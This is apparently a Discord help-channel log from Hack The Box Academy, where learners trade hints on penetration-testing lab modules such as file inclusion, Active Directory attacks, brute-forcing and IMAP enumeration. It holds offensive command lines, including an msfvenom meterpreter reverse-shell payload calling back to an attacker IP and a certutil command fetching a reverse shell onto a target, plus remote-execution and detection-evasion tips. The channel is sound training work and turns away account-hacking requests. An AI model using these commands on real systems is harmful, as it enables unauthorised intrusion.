#modules

yea but you are trying to get a response back on your netcat to grab cookie correct?

if i buy the student subscription for htb academy does that mean i dont have to pay cubes upto tier 2 modules

As long as you're subbed, yes

And if you complete the module iirc you have permanent access

will the 8 dollars be deducted automatically every month or do i have to renew it manually

Automatic as long as the payment source is valid

what if i want the sub just for a month, i have a lot of free time rn

You can always cancel right after you subscribe, and it'll remain for the month.

alright cool thanks

HTB Academy -> Module: File Inclusion -> section : Php filter
Fuzz the web application for other php scripts, and then read one of the configuration files and submit the database password as the answer
I tried by Source Code Disclosure (convert-base64) , curl , nothing happen any guidance

hey @fathom pendant can i DM you pls?

For?

some advice if you are ok with that

Sorry I'm about to sleep soon so brain is off

not technical

will be quick

Sure

@high sentinel it's ok if I DM .. MarcieLee is going to bed

and need some quick advice

sorry to ping like that

why don't you just ask here? 😄

it's a bit professional private advice

don't want to show it here

why? 😄

kind of not sharing with all people

that's all

so you are looking for an advice, that's it? 😄

yup

will be quick

seriously

well i could probably answer it, but unfortunately i'm about to leave as well 😄

ok ok

may i leave the question on your DM in case you may think of sth?

possibly

ok thx

hey guys im trying to do the medium lab for IDS/IPS evasion. i am currently trying to run a UDP scan tracing the packets with 20 decoys and using the source port as DNS. i am using the sV mode to try grab the version but have been unable to

How can I hack into my old snap account

Don't need decoys, don't need sV, think back to the section about the different type of scans

hint: ||instead of using -sV you can try capturing with tcpdump. If it does not work on your VM try on PWNBOX cause it has happened to some folks ||

im attempting to use --script dns-nsid

Nah using a specific scan type you can get the port every time

after removing both sV and decoys

I've sanity checked it

No scripts needed either

what the flyin

just normal

nmap -sU

Nah

People keep saying udp is needed on that, but it's not

The port is TCP/UDP but it's a specific scan option that will get you it

how is the nudge without using udp out of curiosity?

u dont need to use decoy

its just a simple command

sS or sT isnt working for me either

One of those should work on their own

There's a scan that you can copy directly from the IDs/IPS section

Just need to change ip

And remove the port iirc

Yea no luck

Try running in pwnbox BC I legit sanity checked this the other day

Can I dm u my cmd?

Hey anyone know how to get into a snap account

anyone that can help me with AD module assessment 2?

making progress, but stumped on something

just got the flag on SQL01, but not really sure where to go from here

DM me

GOT IT

No. If you can't log in, contact snapchat.

Ok thx

Is cracking the IPMI password supposed to take a long time? I made it to about 20% in 18 hours and my vm crashed 😭

@steady python no

Any tips? @placid quest I dumped the hash with metasploit and then ran the hashcat command to crack it

@steady python use john

try rockyou first

Thanks. That was insanely fast.

Usually, if you're meant to bruteforce something, it will be in rockyou.txt.

I conquer but the way the module is written, it lead me to think I was getting the hash of a randomly generated 8 character password

U got this question ?

Guys im still stuck in academy module about sql essential, can i DM?

sqlmap*

why i get this error ? curl -X PUT http://ip:port/api.php/city/london -d '{"city_name":"flag","country_name":"(UK)"}' -H 'Content-Type: application/json'
Unknown column '' in 'field list'

in the Documentation & Reporting Practice Lab
Can anyone please give me a hint for the first question? "Once you achieve Domain Admin level access, submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host". I have from the previous pentester the hash of an admin but this is not an ntlm hash so i'm not sure how to proceed here

What error?

Unknown column '' in 'field list'

DM me

Change country_name as per question

i tried that too

Dm me

ok

Active Directory Enumeration and Attacks Skill Assessment I

I have some questions about it:

1. Can we compromise the DC without tunneling?
2. At the last step, I can use crackmapexec to perform command execution but cannot get an interactive shell. Can someone nudge me how to do it?

I'm just taking a break from that one for a bit. do some other mods and come back to it someday. thanks for checkingd

OK np. you welcome

You can use something like certutil -urlcache -split -f "http://attackingIP/windows reverseshell" /path/on/target to remotely download files to the target with your RCE

Did you do it in this way too?

I keep getting port 22 connection refused in Linux fundamentals

Good morning. I am working on imap enumeration. I have answered all questions but the last two:
What is the admin email?
Try to access the emails on the IMAP server and submit the flag as the answer. (Format: HTB{...})

I have connected to the smtp server via open ssl and can login with robins credentials. While on the server it shows there are 0 messages. I am assuming in the email i will get the admin email and the flag? Any assistance will be appreciated

how many inboxes does the user have

This is just how I get interactive shells on windows systems if I have RCE yeah

let's avoid the spoilers a bit

you have the list of the inboxes, have you tried to go through them?

yeah right when i was typing that i found the message trying to figure out how to list and fetch it

Anyone around that I can bounce some ideas off of for initial access to the "Password Attacks Lab - Hard" module?

Hi guys need some help on Windows Privilege Escalation Skills Assessment I, having some trouble on getting the exploit onto the box.

Certutil doesn't seem to work, returns an internal error.
Wget also doesn't work

sure shoot me a dm

for that i use wget but output the file to temp

Nevermind, found it literally right after I asked.

nice

Hello guys, I'm stuck at decoding this flag using burp suite decoder at the encoding/decoding module: VTJ4U1VrNUZjRlZXVkVKTFZrWkdOVk5zVW10aFZYQlZWRmh3UzFaR2NITlRiRkphWld0d1ZWUllaRXRXUm10M1UyeFNUbVZGY0ZWWGJYaExWa1V3ZVZOc1VsZGlWWEJWVjIxNFMxWkZNVFJUYkZKaFlrVndWVmR0YUV0V1JUQjNVMnhTYTJGM1BUMD0= . Could anyone help me please?

Please also tell me how you decoded it

@autumn pilotcan i dm you

I used cyberchef 😅

i have the mailbox i cant get the fetch command down

what's that

here you can give this a try https://donsutherland.org/crib/imap

Google it

@vital adder i am using that

it is not liking my flag commands

i know the message is in seen

i got 0 idea about what you mean in your first question but for the second one if you are using cme with the hash and can get RCE you can just use evil-winrm for a shell

ahhhh i see ^^ thanks

but how would i go about it without burp suite? there stands nothing in the module for such tools

1. find what kind of encoding it is
2. decode it

Ok Think I'll do it this way

I found the flag using internet websites

Or psexec.. or wmiexce... or any of the impacket exec scripts... or rdp (cuz usually domain admins can rdp to the DC)

oh no F psexec that F ing tool wasn't working for me in offshore for no reason and i was stuck for 2 day thinking i was doing something wrong

after i found out i can just basically do the same thing with wmiexce everything work just fine that tool save my ass

Yea. Psexec is weird

wmiexec is also way better if you care about opsec

(Yes I know it's still pretty bad but it's better than psexec)

if youre positive you have valid creds is always worth running down the gammut of options just in case.

Yep

theres always gunna be that one box that just flat doesnt work with your preferred method.

i got a F ing ticket in my case 🤣

I include tickets as valid creds lol

Well I mean, I ticket pretty much is a password lol

Sometimes it's better than one

Other times you wish you could shove the ticket down the DCs throat

I have a question on the "Footprinting / IMAP/POP3" module:

I logged into the IMAP server with the "robin/robin" credentials, selected the inbox and now I'm trying to read the messages. I tried these commands:

||1 fetch 1 all||
||1 fetch 1:4 (BODY[HEADER.FIELDS (Subject)])||

... and similar ones.

They all return the same message:

BAD Error in IMAP command FETCH: Invalid messageset (0.001 + 0.000 secs).

A google search says that this is a bug in dovecot versions 0.99.13 and earlier (see https://bugzilla.redhat.com/show_bug.cgi?id=429100 and http://blog.tcg.com/blog/dovecot_invalid/).

So, my question is:
Am I using the correct command to read the inbox emails? Has anyone had the same problem?

Thanks!

hey i could use some help. im working on password attacks module. im on the ATTACKIN SAM part. i have saved the sam file but when i go to move it to fileshare, it says permission denied and i have literally given full control to every user in regards to that file just to be sure lol

Just fetch 1 without addtl queries iirc

im on the ffuf module

doesnt ffuf it just instantly says 39/39 with no output

probably a vpn issue

but the question is telling me to scan /blog

something has to be ther

i see those errors ...hmm

i dont know why but its def a vpn issue

was working fine minutes ago

heres the vpn output

In the active subdomain enumeration exercises, I'm having issues with the second exercise. I've done a zone transfer and the numbers of zones I submitted from that is incorrect, and I also tried with dnsenum and the number of found subdomains is again, incorrect. I'm not sure what's going on and would appreciate some help

yea i had a vpn issue on the NFS assessment...couldnt look at the NFS share...reset and then I could see it...was questioning myself for 30 min

The is expected output. Try reconnecting to the vpn

question 2?

yes "Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer. "

nvrmind...thought you were doing the DNS assessment

ahh

restarted the target and it worked

You should be able to get it with axfr

hey - how long should it normally take for your own machine to connect to the vpn when running the openvpn command?

probably a minute, max.

hmm okay, doesn't seem to work, i'm going to troubleshoot it thanks!

Do you get an error message?

I mentioned that I did that already

Zone transfers and dnsenum tool

also tested for zone transfers of the subdomains and some worked

However, none of the numbers I'm finding are correct

takes me about 2s

it's stuck on

2023-01-13 16:49:42 net_route_v6_add: dead:beef::/64 via :: dev tun0 table 0 metric -1

the funny thing is that I have finished all the other questions, I just cannot finish the second one

got it to work 👍

What was the issue and what was the fix?

zone != subdomain

What is the difference exactly? I found this post but don't fully understand it.

I already did. Also tried psexec and wmiexec with no success. For the first question, I used tunneling to interact with the internal domain, but I would like to know if someone can compromise the DC without using tunneling or port forwarding.

shoot me a dm

This also helped me a lot:
https://www.atmail.com/blog/imap-101-manual-imap-sessions/

sup, anyone looking for help? 😄

if you have a minute: #modules message

afaik zone can be a a top level (ie company.com) domain while a subdomain a "subzone" if that makes sense

honestly not sure, restarted my VM and it worked after that lol

possibly try looking up what a zone transfer, that might get you bit of a better understanding of that

Asking things like this is against the server rules. Id advise you delete that message if you want to remain in this server

but what happens if I cannot do a zone transfer. How do I know if it's a zone or a subdomain?

isn't the difference obvious? example.company.com vs company.com, at least that's my take on that

the zone company.com can contain records like server1.company.com, server2.company.com and the subdomain (in DNS terms it's a zone as well) can contain stuff like otherserver1.example.company.com, otherserver2.example.company.com

Subdomains are x.company.com

Then they can have their own subdomains, but that question is specifically asking for the main domain how many

I have a question, if I take the Silver Annual Billing, it says I get Direct access to the entire Penetration Tester job role path

But OSINT: Corporate Recon says I still need to pay the cubes?

The Silver Annual Subscription includes modules up to Tier II. Tier III and IV modules are not included and must be purchased with cubes.

What you get

Direct access to all modules up to (including) Tier II
Direct access to the entire Bug Bounty Hunter job role path
Direct access to the entire Penetration Tester job role path

• Unlimited Pwnbox usage
• CPE credits submission

Direct access to the entire Penetration Tester job role path

Afaik OSINT: Coorperate recon isnt part of either job path

https://academy.hackthebox.com/module/90/section/1559

The OSINT module is not part of the CPTS.

but it is

check 13.

Ah I see now

Nevemind, it says "recommended

but not actually in the path

The actual path has 28 modules, the recommended path has 33

yes

I see, I just figured if i tollow the section its the most viable way

hi im having a problem when executing a msfvenom payload:

Anyone knows why thats happening? I generated the .elf with this command:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.238 LPORT=443 -f elf > shell.elf

and waiting for a reverse connection in msfconsole:

looks like the x86 is the issue

you probably want to use the x64

that machine name look familiar which module are you on? also i 100% i remember the Web Delivery module, run 1 command on the target machine and you got a meterpreter shell

@vital adder ATTACKING ENTERPRISE NETWORKS

ill try

same problem 😦

options?

what is the exact msfvenom command?

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.238 LPORT=443 -f elf > shell.elf

ok, options?

btw in the module they put this:

maybe im using the wrong payload in msfconsole

you're using different payload

the payload in your options is generic/shell_reverse_tcp and you are using a linux payload

im using the default and its maybe a non staged

you cant combine different payloads

go back to x86 and use the same for both msfvenom and msfconsole

xD

im trying ot get a flag but it keeps giving me errors in my curl command, would i be allowed to send my command and error so someone can tell me what is wrong/what i need to change

its a syntax error

sure

curl -X PUT http://161.35.162.53:30564/api.php/city/Detriot -d ‘{“city_name”:“flag”, "country_name":"HTB"}’ -H ‘Content-Type: application/json’
Unknown column '' in 'field list'curl: (3) unmatched close brace/bracket in URL position 17:
country_name:HTB}’

eveyrthing after json is an error

are you sure you're using correct apostrophes?

ive treid ' ' and

should be used like this -d 'something'

so the ones next to the 1 key

?

is there any fast website for decrypting the impi hash?

hashcat is taking foreverrrrrrr

i mean like -d '{ "something" : "here"}'

curl -X PUT http://161.35.162.53:30564/api.php/city/Detriot -d '{“city_name”:“flag”, "country_name":"HTB"}' -H 'Content-Type: application/json'
so like that^?

"Unknown column '' in 'field list'"

bruh io hate syntax errors like bruhhhh

like when you know the command is right, but the syntax is like "no'

is linux well suited as your daily driver for full-stack development?

Hello, I need help with zap, I can't use the zap interface

okay so the commadn works all the way up to -H 'Content-Type

nvm

is there anyway to get around using hashcat to decrypt the impi hash?

I think John can decrypt

yooo

have issue with trying to get root flag in privilige escalation

when I tried to ssh into root with my id_rsa I'asked for pasword

did you use -i?

yeee

did you chmod the id_rsa first?

^ and did you chmod the permission

on the ffuf module

yeee 600

on the skills examintion

is there a way to ffuf with multiple extentions?

And you did root@ip yeah?

yeeee

I think if you use -e you can specify extensions seperated by comma or space, not sure

ssh root@numbers - p port -i id_rsa

and then load key id invalid format

i tried both

paswsword:

i searched on the github there was sum stuff abt a file

dirsearch

i didnt understand it though

used at the end of the command

oh

i mustve

Oh

its cus i did .php, .php7

my fault

what question are you on?

wasnt meant to put a space

get root flag

privilige escalation starting point

like on regular htb?

sounds like maybe you didnt copy the key fully.

do you know if you can do multiple urls?

Not with just ffuf. But you could script it with bash or python.

alright

ty

yeeee
I left that part out
with private key starts here

that'll do it

Do you have the ---Start RSA and ---End RSA? In your key?

now I do

https://tenor.com/view/anya-anya-forger-anya-spy-x-family-anime-anya-spy-x-family-spy-x-family-gif-25682632

but I didnt have

https://tenor.com/view/anya-anya-forger-spy-x-family-anya-spy-x-family-anime-gif-25683406

are gifs blocked here <?

You need to verify your HTB account in #bot-commands

Yo, i'm working on the File upload module and i got a question: i have to find an extension that is not blacklisted and can execute PHP code on the web server, to read /flag.txt. So i fuzzed extensions with a php-echo payload and found some extensions, which should do the job. upload worked, but when i try to communicate with the webshell, i get a blank page. viewing the source i see the uploaded web shell red underlined with a text: Saw “<?”. Probable cause: Attempt to use an XML processing instruction in HTML. (XML processing instructions are not supported in HTML.) . Any ideas on that? Thx in advice.

how can i like become a white hat hacker (hackerone) something about the same as hackerone how can i learn that?

does it have something to do with the header? (xml)

Seems like a good question for #general

I do not have acsess to that

How do i

Verify your HTB account in #bot-commands

You do

For this Module and Question: Footprinting > Host Based Enum > DNS > What is the FQDN of the host where the last octet ends with "x.x.x.203"? Can someone tell me if I have the right wordlist that will answer this question?

The list is in there yes

Also subdomains of subdomains exist remember that

Thank you for the sanity check!

Right, I found a few others already: x.sub.inlanefreight.htb.

Nope

That was just an example. I can dm you specifics if you want.

But dnsenum tool is based

That is what I'm using.

@fathom pendant Thanks for the sanity check and the assitance! 🫂

Npnp

Hello

Asking for those things is agaisnt the rules of this server. Would highly advise you delete that message if you want to stay here

Hi tux

sup

I want not to be hacked, that is, I'm just from Russia and I want to know something)

Sorry

I just wanted to find out how they do it And so on to get information, I want to apply for a programmer, but I think that I can’t pull profile mathematics, so I’m going to protect information ...

what can I learn about here I have a very strong desire, but in Russia they don’t teach this

if you want to learn how to hack instagram account you can kindly F off but if you want to learn cyber security and don't know where to start give both of these video a check https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=lhz0-qAQlBM

hi, i'm a bit stuck in the module "Getting Started" in "Knowledge Check", im in the admin pannel, i know what i have to do (upload a file) but the button to actually upload does not seems to work. i have also tried with metasploit but same thing "upload failed", i have tried to upload a file using wget just in case and it does not work neither? Can you guys tell me if im missing something ? Thanks a lot

me gusta chuparle el culo a mi tio

hint that's a ||rabbit hole|| and you'll need to find a different method to exploit this

me too

😉

Thanks ! 😄

i got a 3rd leg rn

magic

Hi guys, I'm stuck at the Web Assessment for Proxies. /lucky.php I should enable the disabled button. Once I undisabled the button using burp suite or ZAP it send the request with the getflag=true param. But I don't get the flag. Is this normal? How do I get the flag?

i am a skid

can sm1 teach me

that's a luck thing (hence the name) and you have to click it a bunch of time

i did make a bash script for this and i think like out of 100 click i got like 10-20 flag back

k thanks!

I could use repeater at burp suite right?

Has anyone thought of making a more advanced job-role path that picks up where an already existing one left off?

I would love an advanced web app hacking path or an advanced penetration testing path

Etc

Just a thought

most likely yes i think i did have some issue with that the first but i think it's was a bug on my site so i think you should be able to

👍

Academy has some advanced modules that aren’t included in job role paths is why I am asking

W

oh god please don't tell me ima have to make a shell

oh I def will

Nibbles starting point thing should walk you through it

Ye I should be fine

also I def need to learn that to succeed

hi all, is anyone on the fingerprinting module? am I the only one to whom the footprinting lab machine is constantly dying?

Which footprinting are you having issues with

hey i could use some help. im working on password attacks module. im on the ATTACKIN SAM part. i have saved the sam file but when i go to move it to fileshare, it says permission denied and i have literally given full control to every user in regards to that file just to be sure

i have no credentials (assumed and tried the ones from the past levels), can't enumerate any strings on snmp so bruteforcing seemed like an option

thing is, everytime I boot hydra for ssh for example (even with the -t 4 option)
the machine freezes -.-'
need to respawn
https://tenor.com/view/sonic-the-hedgehog-knuckles-knuckles-the-echidna-dancing-dance-gif-17792854
maybe bruteforcing the login is no the way but still quite frustrating

Which part of footprinting are you on, the lab? Easy, med, hard? Hydra isn't needed

There's a tool to find the community string for a given domain have you tried using that?

hard

Yeah bruteforcing ssh isn't the way to go

Snmp is your initial foothold.

ok thanks! so bruteforcing the community name seems to be the way then.. one question: for each level, is the provided wordlist enough or shall we use different ones (e.g, seclists)?

Seclist, the footprint word list is just usernames

Seclist is nice enough to give us their lists split up in different folders

But first you need to find the comm string using one of the tools shown in the module

thanks for the tip.. i've tried before with all the lists from /usr/share/seclists/Discovery/SNMP/ with onesixtyone but as I had no hit (and I thought the "thematic" seclist would be the one to use) I moved to a separate service (like ssh in this case)

will try other seclists like rockyou or so

¯_(ツ)_/¯

so it tells me why this is but could someone explain better?

wth @wide path imagine having the same username

😄

Hey guys, I'm doing the module Intro to network traffic analysis and I think I spotted an error but I'm not sure that's why I prefer to ask here. In the section TcpDump Packet filtering there is this sentence :

AND as a modifier will show us anything that meets both requirements set. For example, host 10.12.1.122 and tcp port 80 will look for anything from the source host and contain port 80 TCP or UDP traffic

Shouldn't it be ... "the source host and contain port 80 tcp traffic" instead of "80 TCP or UDP traffic" ? In the command there is "tcp port 80" so it filters only tcp port 80 not UDP right ?

what is it that you don't get?

Why can't I just vim the file and replace the current code* and add a shell

uh ?

what is the command?

host 10.12.1.122 and tcp port 80

that matches exact host and tcp port 80

yes but the sentence says : port 80 TCP or UDP traffic

i'd say that's incorrect then

thanks

my just my opinion, you could try testing that yourself locally

with something like nc or so

i think i'd need more context for that, looks like it has to do something with the monitor.sh file

I don't need help with anything related to the actual box just the module text I posted

yeah i get that

What I mean is basically why can't I just edit the file monitor.sh and replace all its previous code with the one liner rshell

you possibly can if you have the perms for that, the idea might be that you're gonna break the functionality or possibly spoil the box for other ppl (if that was part of the box)

not sure exactly on that, try asking someone else 🤷‍♂️

ah ok

ty

yeah probably functionality

The point is showing you how to append to a file; the copy part is so that you don't have to reset the box if you bork it hard

@fathom pendant just wondering how come you seem to be helping here so much? Is that like your job or so? 😄 👀

well, I did fork it hard infact I accidently added two shells, one with wrong info and I think I forked myself over

Idk if there's any way to fix that

I should have made a copy

😄

exactly like the module told you so? 😄

yeah! 😄

I should have listened

better listen to it next time then 😄

yep!

oh it lets me use vim, maybe I'll get lucky and the vim gods will let me do what I want to do

nah I'm screwed rip

Just like helping people

Try extracting data from the db.

Hi guys any help on Windows Privilege Escalation Skills Assessment - Part II?

Already ran Windows Exploit Suggester, tried a few but nothing seems to work.

Okay

i got john to crack the ipmi hash i had an issue with earlier. however, now when i use the --show command it says duplicate option and does not work

John saves hashes look where it saved to

And it's in there lol

Marcie you are so clutch if this was Twitch id cheers ya

TFW I forget about the trailing . In lookup queries lol

Hey, Thanks for your responses on Moondark's questions, very helpful. My list is 187k long. I've cut the first 17k lines as suggested. My target is active for 80 minutes and I can usually get through ~3500 attempts in that time. I've split the mutated passwords list into 48 splits and am slowly working through them one at a time.
Someone else suggested avoiding brute forcing ssh and instead target a faster service like smb, my question is - is there a way to reduce the wordlist to a reasonable size to crack in one session, or is the module designed to make me process a potential 30+ hours of brute forcing to find the credentials.

$2y$10$vdrhbczi1dzgzatpdcdg.o6bnalj1cd5hbqhmgjhjw982aijugwby

what kind of hash is this?

I always look here: https://hashcat.net/wiki/doku.php?id=example_hashes , but I do not see one like that listed

thx

Happy happy friday nerds

Have you considered bcrypt / Blowfish

Ftp is much faster than ssh. Never try to brute force ssh unless you've literally tried everything else

I'm working through the "Attacking Common Applications" module and we're shown when attacking CMSs to first set up a web-shell and then execute a bash one-liner in order to get a reverse shell. Is there a reason for this two step process? Why not just paste a PHP reverse shell, instead of first a web-shell and then getting a reverse shell?

The idea is to ensure your reverse shell actually gets executed. Imagine you try to fire off a reverse shell and get no call back. Then you spend 20 minutes trying to figure out why it dosebt work, only to realize the site isn't actually exectu8ng php like you thought it was. All of that would have been avoided had you run some php code that would display something back to you

You don't have to use a webshell first but it's generally a good idea to confirm what you think is happening is actually happening

I see, that makes sense. Thank you.

On top of that, when you care about not getting caught, getting a full reverse shell is very very dangerous and should only be done after you've throughly enumerated your target through a webshell and determined the active defenses

anyone done the common applications skill assess 1?

not too much opsec discussion on htb cause its unneeded on a sanctioned pentest but more likely adversary be running these tools from some kind of c2 framework or even custom made tools through multiple proxies and may have a machine spun up on a cloud service so if there is computer forensics investigation they will see the I.P and data of your cloud computer and they may even be connected to that through another proxy or 2 of various kinds.

Yes. And I know opsec isn't completely relevant on htb but my career endgoal is redteaming so for me opsec is very relevant

You dont need opsec on a sanctioned redteam activity cause your op is already known and fully disclosed lol.

You are aware that opsec involves more than just hiding your identity?

The whole point of a red team engament is to emulate a real threat actor

not much opsec as most of the time your disclosing vulnerabilities and how you found them,

Yea but you don't disclose them till after???? Bro the point of a red team engagement is to see what would happen if a real threat actor decided to attack your buisness. That involves staying hidden for as long as possible, which is almost 100% opsec

operational security is keeping the knowledge and methods of an operation or activity hidden. By definition there is no opsec on a sanctioned redteam activity because your "operation" is 100% known and expected.

You're completely misinterpreting that. You need to keep your activity hidden while the engagement is being carried out. Yes, you will disclose everything after but that does not mean you can just get a shell on a machine and run whoami on a red team engament

That will get you caught instantly

ok well guess your right there is opsec employed during the engagement

with the intent of practically destroying all or almost all of your opsec at the end of the engaement

Yes. Opsec does not exclusively cover the methods used to achieve whatever the goal of the engagement was.

The methods will always be revealed. Otherwise there would be no point. But the second half of opsec is not getting caught. And that's a very big part of red teaming

(Also were very off topic so probably best not to continue this conversation in this channel)

Can someone help me on Attacking Common services hard lab? I'm on the last step and im trying to figure out what i should do....

i can help

dm me

Thanks

Any tips on how to get a hostname in the nmap enumeration academy module?

I tried everything I could think of with nmap, then I tried nc and telnet to each open port, then I tried browsing to the apache server. Couldn't figure out how to connect to back orifice. Arp and ping with name lookup options on didn't help. Tried smbclient because it looks like SAMBA is running on the host. I'm all outta ideas.

nvm I figured it out. I caught the hostname in output a couple of times but mistook it for nmap artifacting

Hello , i need help if there is anyone used DefenderCheck for Av bypass , i try to compile it using visual studio but it refused any help ...

Hey guys...

Ineed help

To hack website

How about you read the server rules instead?

What.

Ohh it's rule 7

Sorry for that

It's bull shut

Group

I'm leaving this group

does anyone have any ideas about this today?

where is general channel

its not appearing

help

@languid dawn

mods

Please read #rules and go to #welcome
Use ++verify in #bot-commands and follow the instructions from the bot in your DMs

Live Engagement: What is the hostname of Host-1? (Format: all lower case)

Module: Shells&payload
Section: Live Engagement: What is the hostname of Host-1? (Format: all lower case)
question: how can I access to web browser? or should I use other tool to get hostname?

Why in the Attacking AD module doesnt talk about ASREP-roast attack?

See here
https://academy.hackthebox.com/module/143/section/1276

Module: Attacking Common Services - Easy
What wordlist do I use to brute force the ftp server with || fiona@inlanefreight.htb || , I have tried the provided one, rockyou.txt went up to 20000 which I felt was a bit much and many others. Been stuck here for quite some time now so any help would be appreciated!

Maybe the username is not correct.
With rockou you should get success quickly

How do I go about this question from Web Proxies Assessment? Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload). I'm using Burp suite for fuzzing. For the Payload settings I'm using the alphanum-case.txt. For Payload processing it's following:

1. Add Prefix: 3dac93b8cd250aa8c1a36fffc79a17a
2. Base64-encode
3. Encode as ASCII hex
   At the attack results I noticed every Length was the same and no payload was right. What should I do now?

still need help with that?

yes

i think you're having a couple of issues there

i have entered every possibility manually but still no luck xd

why are you using base64 encoding?

"while encoding each request with the encoding methods you identified above"

hmm, ok then

isn't is reversed then? steps 2 and 3?

like if you can provide the exact payloads if would probably be much more clear, i haven't done that myself i can't tell without seeing it really

no otherwise the hint wouldn't be correct (has to be 88 chars)

this is the md5 where 1 char at the end is missing: 3dac93b8cd250aa8c1a36fffc79a17a

and the original cookie looks like? what is some example payload that you're sending?

"The /admin.php page uses a cookie that has been encoded multiple times. Try to decode the cookie until you get a value with 31-characters. Submit the value as the answer." this is the md5 cookie

example payload: 4d325268597a6b7a596a686a5a4449314d4746684f474d7859544d325a6d5a6d597a6335595445335957453d

its the hex encoded from the base64 encoded md5 string "3dac93b8cd250aa8c1a36fffc79a17aa"

yeah, that looks fine to me

yeah, i think the issue is the step 1 then -> append, shoudn't it be prepending instead?

"So, try to fuzz the last character of the decoded md5 cookie"

solved? 🙂

it isn't the issue, just tried it out but still doesn't work :/

hmm, that's not making sense to me

so, let's say that the character is A, how does you generated payload look?

what wordlist i have to use to crack the pw hash from NOSQLI assessment 2 ?

NVM ....

yesss!!! finally, im so dumb. I should've read the question more careful

ty

rockyou?

tried for about 30 minutes

what hash type is it?

blowfish bcrypt

Doesn’t work. I get the exact same error as before.

that's generally not easily crackable so you might need a specific dict for that (not sure what) or just try something simple like username, admin or so

alright im giving it a try

The majority of things designed to be cracked on HTB are from rockyou.txt

Mostly meant to teach how to crack something rather than expecting you to throw random wordlists at it

yo could anyone give me a nudge on the login bruteforcing skill assessment

the web login part

@pliant sage I am stuck on that i got 1234567 as the password but it is not working

i got the first password

but i can't crack the second login form

@placid quest

@pliant sage The second login page i got the password but the password is not working

yeah you probably have the wrong fail string if your password is 123456

@pliant sage the string is correct

nvm figured it out

Hi all

i am struck in snmp section of footprint module. at last question .... anyone have clue . please let me know. i already try . snmpwalk command as well. but i am not sure how that answer should look like.

When you run the snmpwalk what do you see?

is tere anyone just started learning on the academy??

snmpwalk should give you the answer fairly easy. You will have to let it sit for a little while and youll eventually see what you are looking for

if you are doing it from your own VM, try doing it from the browser based pwnbox

if the snmpwalk trail doesnt continue for a little while that is

@glad wave dm you. please check

@ivory hollow i was also stuck at same problem its very simple . actually when you run onesixtyone you think that there is nothing happening but the output is giving you the community string of the target after getting that community string you should use snmpwalk

re read the module very carefully even if you are unable to get the answer dm me

Hello

I hope you are all well 🙂
I'm having an issue on the Getting started module , chapter public exploits
I configured my exploit on metasploit and when i use the cmd exploit the connection with the target drop

shoot me a dm

@cunning drum .... i solved it... thanks for your kind assistance.

I did it

Can anyone point me in the right direction? On the web proxy assessment, I have found the disabled button html... But how can I enable it with burp? Or Zap?.. i can't find anything on how to do this

You don't have to crack the hash, there is something else on the db.

a different user/pw or do you mean a third field like notes or something?

try to bruteforce the parameters ( e.g. with regex matchin everything )

The lightbulb in Zap will do it- this is described in the "intercepting responses" section. You could also do it with Burp or Zap as described in the "Automatic Modification" section- just find the HTML that is disabling the button and change the HTML in the response so your browser will render your modified HTML with the button enabled

Don't brute force ssh, it's a slow service to brute

Have you tried other lists?

lightbulb was completely broken for me 2 days ago but yeah you can use burp to modify every incoming response w/ the word "disabled" in it

May be kinda finicky... Working for me rn, but I'm on local kali vm not pwnbox

can anyone give me a nudge for bruteforcing applications - service login skill assessment

Yeah I have a local kali too, was fighting for my life to get zap to function each time i tried to use it

c./username-anarchy Bill Gates > bill.txt
zsh: permission denied: ./username-anarchy why is it denied? tried it as root aswell stille the same

is there a javascript function to get a parameter name ?
i want to use this.xxx.startsWith("") to investigate further, but the parameter name is unknown to me.

i tried to spray some parameter names just like this.flag...

.match(/.*/g)

I get this error when using whatweb: "ERROR Opening: http://app.inlanefreight.com - no address for app.inlanefreight.com" even though I set the given ip to inlanefreight.com in /etc/hosts

Did you also add the subdomain? (app.inlanefreight.com)?

okey i think you misunderstood me

i need to know the parameter name aka variable, not the value of it
before i can bruteforce its content with eigther .match() or .startsWith() i need to know the parameter name
like this.unknownparameter.match("/.*/g")

Can I pm?

sure

how to add role in discord i am htb vip user

in academy

#welcome

no, i dont know the ip of it I was just given 10.129.103.128 for inlanefreight.local

If this is just a vhost, it should be the same IP.

Hello

Need some help for a chapter on the GETTING start module

I can probably help.. What's the question?

im stuck and I do not know what i can do 😦

im a beginner ^^

What section of the module are you on?

public exploit

dm

Can anyone help me by bypassing a gmail password please i really need help

dm'd you

😄

I'm gonna go out on a limb and guess you don't own this account?

cmon, don't be that way 😄

Well I mean if he owned it then he could probably get into it by hitting "Forgot Password"

He’s not wrong but in a way i do

No. Theres no complexity to this. Either you do or you dont

Its not mine but this dude gave me a stacked steam acc but left it on that gmail but there probably 5k worth of stuff on it

Can't help you.

"gave" 😄

Ok

He did

I'd also highly advise you don't ask in this server again if you don't want to get banned

Alr

hey - im currently doing the zap scanner question in the 'using web proxies' module but i cant seem to figure it out. i managed to find the high level vuln but im not sure how to apply it

i'm not sure what kind of advice are you expecting on that 😄

how smb can be giving false positives?

whatcha mean

i you literally said you have an issue with something unspecific 😄 what kind of advice you expecting for that? "turn on your computer"?

are you having a bad day today?

sounds like anonymous authentication works then? have you tried looking at the traffic or using another tool?

i dont want a spoiler

cme working for any creds is not making much sense to me, the only reasonable explanation seem to be anon auth

otherwise just try looking at the traffic

hey - im currently doing the zap scanner question in the 'using web proxies' module but i cant seem to figure it out. i found the vuln path traversal on the comment page, how do i use this to find the directory containing the '/flag.txt'

what about smblient -U 'random%asdf' -L //1.2.3.4?

afaik there are two types of smb authentication when it comes to smb without creds. I'm not sure about the correct naming, i think one of them is called anonymous and you don't need any username for that, for the other one you can just use any name/password iirc or maybe just any name without password (ie smbclient -U 'random' -N //..)

well, isn't it possible that you can get any data off the smb first to possibly get working creds for it to access another share or so?

i'm not sure you're getting what i said but i may be wrong about that, i haven't done any of the academy stuff. If you can do anon auth to smb, you can list shares and possibly access some of them. If there was like a share username which would require a specific password/username combination you would need to bruteforce that to access it. There could possibly be a wordlist accessible anonymously on another share or so.

any idea about the OS of the box?

try using -d domain, --local-auth or just using box_name\username with cme

